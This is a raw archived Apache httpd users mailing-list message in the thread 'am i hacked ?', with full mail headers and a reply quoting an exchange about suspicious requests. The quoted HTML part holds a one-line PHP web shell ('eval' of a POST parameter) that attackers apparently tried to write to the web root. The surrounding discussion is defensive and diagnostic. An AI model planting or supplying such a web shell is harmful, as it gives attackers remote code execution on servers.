Return-Path: X-Original-To: archive-asf-public-internal@cust-asf2.ponee.io Delivered-To: archive-asf-public-internal@cust-asf2.ponee.io Received: from cust-asf.ponee.io (cust-asf.ponee.io [163.172.22.183]) by cust-asf2.ponee.io (Postfix) with ESMTP id 3E08B200C13 for ; Mon, 6 Feb 2017 18:30:55 +0100 (CET) Received: by cust-asf.ponee.io (Postfix) id 3C649160B56; Mon, 6 Feb 2017 17:30:55 +0000 (UTC) Delivered-To: archive-asf-public@cust-asf.ponee.io Received: from mail.apache.org (hermes.apache.org [140.211.11.3]) by cust-asf.ponee.io (Postfix) with SMTP id 62268160B53 for ; Mon, 6 Feb 2017 18:30:54 +0100 (CET) Received: (qmail 3477 invoked by uid 500); 6 Feb 2017 17:30:53 -0000 Mailing-List: contact users-help@httpd.apache.org; run by ezmlm Precedence: bulk Reply-To: users@httpd.apache.org list-help: list-unsubscribe: List-Post: List-Id: Delivered-To: mailing list users@httpd.apache.org Received: (qmail 3467 invoked by uid 99); 6 Feb 2017 17:30:53 -0000 Received: from pnap-us-west-generic-nat.apache.org (HELO spamd2-us-west.apache.org) (209.188.14.142) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Feb 2017 17:30:53 +0000 Received: from localhost (localhost [127.0.0.1]) by spamd2-us-west.apache.org (ASF Mail Server at spamd2-us-west.apache.org) with ESMTP id 887621A03EB for ; Mon, 6 Feb 2017 17:30:52 +0000 (UTC) X-Virus-Scanned: Debian amavisd-new at spamd2-us-west.apache.org X-Spam-Flag: NO X-Spam-Score: 1.179 X-Spam-Level: * X-Spam-Status: No, score=1.179 tagged_above=-999 required=6.31 tests=[DKIM_SIGNED=0.1, DKIM_VALID=-0.1, DKIM_VALID_AU=-0.1, HTML_MESSAGE=2, RCVD_IN_DNSWL_LOW=-0.7, RCVD_IN_MSPIKE_H3=-0.01, RCVD_IN_MSPIKE_WL=-0.01, SPF_PASS=-0.001] autolearn=disabled Authentication-Results: spamd2-us-west.apache.org (amavisd-new); dkim=pass (2048-bit key) header.d=gmail.com Received: from mx1-lw-us.apache.org ([10.40.0.8]) by localhost (spamd2-us-west.apache.org [10.40.0.9]) (amavisd-new, port 10024) with ESMTP id hIYd9H5BftSd for ; Mon, 6 Feb 2017 17:30:51 +0000 (UTC) Received: from mail-it0-f50.google.com (mail-it0-f50.google.com [209.85.214.50]) by mx1-lw-us.apache.org (ASF Mail Server at mx1-lw-us.apache.org) with ESMTPS id 13EB45F570 for ; Mon, 6 Feb 2017 17:30:51 +0000 (UTC) Received: by mail-it0-f50.google.com with SMTP id c7so59424717itd.1 for ; Mon, 06 Feb 2017 09:30:51 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20161025; h=mime-version:in-reply-to:references:from:date:message-id:subject:to; bh=ZZCXPanj2QDrwBREpVGZO934tP0lEd+m6Q65uXs9G6s=; b=Y6D7OdWpiw41vFWQPymT59gWaTPZ42g1TlbJTffRxFXSgVA+4LM5tCpw36jU/Umq0Q AqnCzggGx/XqAbGM/LzTFAlXEKFUY95ca/N2rc10so4XyOSjAaDREgn1OiTYdwuq2GQI 6qCznmBp13xJlvqUxuUx6BKpd/dILTuZxxu5hxVT+HXeMFzu8TM6C3IB4pgliM0PzLKu VIIZeui7FINfD7ZpMccoVieP8HBv8UtwmRE2G3T6jV12WSxwGobMkhMgBw4Ypgu64Di4 78HFYOLarp4WwbcpiUV2K7MXLkq9F780avsmredUbr/HowYSZUbHbctpdsfQ1DWfC9QE Y9ug== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20161025; h=x-gm-message-state:mime-version:in-reply-to:references:from:date :message-id:subject:to; bh=ZZCXPanj2QDrwBREpVGZO934tP0lEd+m6Q65uXs9G6s=; b=fyVoHAY6mDdEMwfw/pu08y2YvPrj1Pj1+GH/PaMCOwH2M4D18lO71PvYr/CVhj72z4 0Sb4xYpRVICYMnQrBFPOgMMT3t0sSBfMxUrekUyLEIEjDDx9Mxf6b314sTY0ciqh6q03 Fq/OH42YPG5SMPWT8F2/Hhr4FRk5ekZQF8OHsHW5sTr1WhIcMngFWnIF+IEHfpPA5tQX vIry5/oTNle0DBQM+xF71K4nO/gK86RQoiW320ghPcN13oHS7mpfI+N5osXECLb/8zRn ot0ORAt/bIBGhrcFX2ZR3zfIh0zTW5EAWeBMIfGHcAoSZ+zwbA/Uz5N94Yn+iEbvf9go Mc8Q== X-Gm-Message-State: AIkVDXL+VXfiLBIZ/s3jyajS9gTJiO3gJXohCAAY/geYrBSykgzr4dkBEs75Xe2Lcb/05ALRwvU/2zuj+rbeeQ== X-Received: by 10.36.189.200 with SMTP id x191mr8506756ite.123.1486402249459; Mon, 06 Feb 2017 09:30:49 -0800 (PST) MIME-Version: 1.0 Received: by 10.107.130.195 with HTTP; Mon, 6 Feb 2017 09:30:48 -0800 (PST) Received: by 10.107.130.195 with HTTP; Mon, 6 Feb 2017 09:30:48 -0800 (PST) In-Reply-To: References: <1789242276.27250137.1486400880413.JavaMail.zimbra@helmholtz-muenchen.de> From: Mitchell Krog Date: Mon, 6 Feb 2017 19:30:48 +0200 Message-ID: To: users@httpd.apache.org Content-Type: multipart/alternative; boundary=94eb2c196fd412a82d0547dffeca Subject: Re: [users@httpd] am i hacked ? archived-at: Mon, 06 Feb 2017 17:30:55 -0000 --94eb2c196fd412a82d0547dffeca Content-Type: text/plain; charset=UTF-8 I see these type of attack strings all the time on Nginx except Nginx gives a 403. Apache is notoriously bad with security and giving 200 ok responses makes you **** yourself. A reason I and many other people have switched. User support on this list was also non existent when I ran into serious SSL problems with 2.4 that until today have been ignored and unanswered. On 06 Feb 2017 19:21, "Ken Robinson" wrote: > > > On 2017-02-06 12:08 pm, Lentes, Bernd wrote: > > The first line is trying to create the file webconfig.txt.php in your >>> DOCUMENT_ROOT directory, with the contents of the file being: >>> >>> >>> >>> I didn't decode the remaining lines. I think they're just trying to do >>> the same >>> thing. >>> >> >> Fortunately there is no webconfig.txt.php. And all folders in /srv/www >> belongs to root and user wwwrun >> is not allowed to write there. >> > > What seems to be happening here is that your system is being probed for > vulnerabilities. > > The attacker is sending a payload string to your index.php file in hopes > that it will not complain and write the string to the file > webconfig.txt.php which the attacker would then attempt to get to with the > real hack in the Posted contents. Are there any requests to get to that > file? > > You should make sure you sanitized any input to your index.php and reject > anything that's not expected. > > Ken > > --------------------------------------------------------------------- > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org > For additional commands, e-mail: users-help@httpd.apache.org > > --94eb2c196fd412a82d0547dffeca Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable
I see these type of attack strings all the time on Nginx = except Nginx gives a 403. Apache is notoriously bad with security and givin= g 200 ok responses makes you **** yourself. A reason =C2=A0I and many other= people have switched. User support on this list was also non existent when= I ran into serious SSL problems with 2.4 that until today have been ignore= d and unanswered.=C2=A0

On 06 Feb 2017 19:21, "Ken Robinson" <kenrbnsn@rbnsn.com> wrote:


On 2017-02-06 12:08 pm, Lentes, Bernd wrote:

The first line is trying to create the file webconfig.txt.php in your
DOCUMENT_ROOT directory, with the contents of the file being:

<?php eval($_POST[1]);?>

I didn't decode the remaining lines. I think they're just trying to= do the same
thing.

Fortunately there is no webconfig.txt.php. And all folders in /srv/www belo= ngs to root and user wwwrun
is not allowed to write there.

What seems to be happening here is that your system is being probed for vul= nerabilities.

The attacker is sending a payload string to your index.php file in hopes th= at it will not complain and write the string to the file webconfig.txt.php = which the attacker would then attempt to get to with the real hack in the P= osted contents. Are there any requests to get to that file?

You should make sure you sanitized any input to your index.php and reject a= nything that's not expected.

Ken

-----------------------------------------------------------------= ----
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

--94eb2c196fd412a82d0547dffeca--